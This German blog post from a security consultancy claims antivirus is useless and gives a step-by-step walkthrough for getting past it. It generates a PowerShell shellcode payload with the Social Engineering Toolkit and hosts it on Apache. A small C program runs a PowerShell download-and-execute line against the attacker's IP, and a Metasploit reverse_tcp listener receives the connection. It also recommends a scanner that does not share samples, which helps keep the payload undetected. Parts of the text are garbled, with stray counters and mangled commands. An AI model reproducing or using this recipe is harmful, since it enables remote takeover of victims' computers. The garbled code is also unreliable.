So unnütz sind Anti Viren Programme:
Anti-Virus Programm, in ein paar Minuten umgehenSchaden Anti Viren Programme mehr als Sie nützen?

Anti Viren Programme zu umgehen, ist für jeden einsteiger Hacker ein Kinderspiel. Warum Sie sich nicht auf ein AV -Programm verlassen sollten.

Adrian Janotta
Gründer Janotta Partner Security Consulting

Kein Tag ohne Angriff aus dem Internet. Egal ob Spionage, Betrug, Erpressung oder Habgier als Motivation dahintersteckt – weltweit werden immer mehr Menschen und Unternehmen Opfer von Cyberkriminellen. Virenprogramme zerstören Computer, sperren Kundendateien oder spähen Geheimzahlen und Zugangsdaten für private oder staatliche Accounts aus, schreibt die Berliner Morgenpost in einem Beitrag>

Dabei nutzen heute viele Unternehmen Anti Viren Systeme, ja Sie sind teilweise sogar rechtlich dazu verpflichtetet, und auch Print und Online Magazine testen oft die Wirksamkeit. In Deutschland ist zum Beispiel AV Test für Ihre Anti Viren Tests bekannt, mit diesen Tests, verdient das Unternehmen sein Geld. Über die Sicherheit von Anti Viren Systemen sagen diese Tests, wofür sich Magazine bezahlen lassen nichts aus. Heute möchte ich ihnen zeigen, wie ich in weniger als 10 Minuten ein Anti Viren System ausschalte. Dabei spielt es keine Rolle, welches Anti Viren System Sie verwenden. Auch sollten Sie die Spionage Vorwürfe gegen Anti-Viren Hersteller nicht vergessen>

Für diesen Penetrationstest habe ich etwa einen Tag Planung und Konzeption für die Filmproduktion investiert.

 

Sie sind gehackt oder wissen es noch nicht?>

Was benötigen wir für den Angriff?

Professionell reproduziert – Vortrag vor Dozenten in München zum Thema: Unwirksame Virenscanner.

 

Wir werden das Social Engineering Toolkit nutzen, um eine Nutzlast zu generieren. Um das Social Engineering Toolkit zu öffnen, geben Sie nachfolgendes in Ihre Konsole ein:

  • setoolkit

Wenn das Menü des Social Engineering Toolkit gestartet ist, wählen Sie die Option 1 für „Social Engineering Attacken“ aus, und im Anschluss Menüpunkt 4, und gleich danach die 9 für „Powershell attack vectors“ und schließlich 1 für „Powershell alphanumeric shellcode injector“.

Jetzt müssen Sie einen „LHOST“ im System vergeben und angeben. Wenn Sie dies noch nicht wussten, dies die lokale IP-Adresse Ihrer eigenen Angreifer Maschine. Für eine Meterpreter-Konvention muss jetzt ein „LPORT“. verwendet werden, ich verwende „8888“, da es eine Meterpreter-Konvention ist, Sie können jeden Port als Meterpreter-Konvention nutzen, die vom System erlaubt wird.

Jetzt müssen wir diese Nutzlast auf unseren Apache Webserver verschieben. Um dies zu tun, öffnen Sie ein Terminal und geben Sie ein:

mv /root/.set/reports/powershell/x86_antivirusdeaktivieren.txt /var/www/html/AntiVirusausschalten.txt
  • 119/5000

Dies liegt daran, dass in Kali Linux Version 2 das Apache-Stammverzeichnis in den Ordner „html“ innerhalb von / var / www / verschoben wurde.

Jetzt geben Sie ein:

  • service apache2 start

… und der Webserver unter Kali Linux sollte gestartet werden.

Schadcode entwickeln

Wir müssen jetzt einen kleinen, nicht komplizierten Virus programmieren. Ich nutze dafür ein Text Programm unter Linux. Sie können aber auch Notepad verwenden. Je nachdem wie Sie gerne programmieren.

Der Code für das Virus ist wie folgt:

#include
main()
{
system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://19.0.0.44/AntiVirusausschalten.txt '))\"");
return 0;

Denken Sie daran, „19.0.0.44“ zu ändern, und Ihre jeweils richtige LHOST (oder lokale IP-Adresse) einzugeben.

Speichern Sie diese als „infiziert.c“,  ab und kompilieren Sie den Virus mit einem C-Compiler.

  • gcc.exe infiziert.exe D: \ Anti Virus Hack \ infiziert.c -o D: \ AntiVirusausschalten \ infziert.exe

Jetzt haben wir unsere FUD („vollständig unauffindbare“) ausführbare Datei.

Metasploit nutzen

Wir müssen nun eine Meterpreter-Session starten. Geben Sie ein:

  • msfconsole

20/5000
Sobald Metasploit geladen ist geben Sie bitte nachfolgendes ein:

  • use multi/handler

Jetzt müssen Sie eine Reihe von Optionen eingeben;

  • set PAYLOAD EIN ORT/meterpreter/reverse_tcp
  • set LHOST 19.0.0.44
  • set LPORT 8888

 

Im Anschluss geben Sie „exploit“ ein und drücken Sie „enter“, um den Listener zu starten. Sobald Ihr Opfer oder das Ziel Ihre Daten die wir eben erstellt haben aufruft, haben Sie jedes Anti Virus Programm auf einem entsprechenden Computer umgangen.

Hinweise und Test

Wenn Sie es selbst ausprobieren möchten, empfehle ich Ihnen vorerst, das Sie Ihre ausführbare Datei testen. Verwenden Sie nicht VirusTotal für den Test, verwenden Sie stattdessen: nodistribute.com. Bitte behandeln Sie diesen Hack als Forschungsarbeit. Er dient nicht als Vorlage für kriminelle Aktivitäten.

Persönliches

Für diesen Hack habe ich mich von einem Dokument aus Wikileaks inspirieren lassen. In dem Dokument wird angenommen, das die NSA und auch deutsche Geheimdienste Anti Viren Systeme mit einer ähnlichen Methode ausschalten, dieses Vorgehen aus meinem Beispiel, wird allerdings nicht angezeigt.

Zentrale Frage an Sie

Die Zentral Frage, die sich sich selbst stellen sollten: Ist Ihnen der Minimalschutz soviel wert, das Sie in kauf nehmen, das Ihr Anti Viren Programm eventuell Daten Missbraucht und Ihre IT-komplett untersucht? Diese Frage stellen sich gerade Sicherheitsexperten auf der ganzen Welt>

Wenn Sie die Umstände vor einem Sicherheitskonzept nach Security by Design nicht scheuen. Heiße ich Sie herzlich als Kunden willkommen.

Sicherheitsbewusstsein erhöhen

Haben Sie Fragen oder Anregungen, möchten Sie ein Live Hacking oder eine Security Awareness Schulung buchen? Benötigen Sie eine Sicherheitsberatung? Nehmen Sie Kontakt mit uns auf.

Kundenhinweis
Liebe Kunden, liebe Interessenten.

Unser Team ist bis einschließlich Samstag bei einem Auftrag in Berlin. Ab Montag sind wir wie gewohnt für Sie da. In der Zwischenzeit, können Sie uns eine Email schreiben, uns erreichen E-Mails Mobil schnell und zuverlässig.
Schreiben Sie uns
Thank You. We will contact you as soon as possible.

JPC Consulting schützt Ihre Privatsphäre. Lesen Sie dazu auch unsere Datenschutzerklärung. Daher bitten wir Sie, Cookies zu akzeptieren oder zu deaktivieren.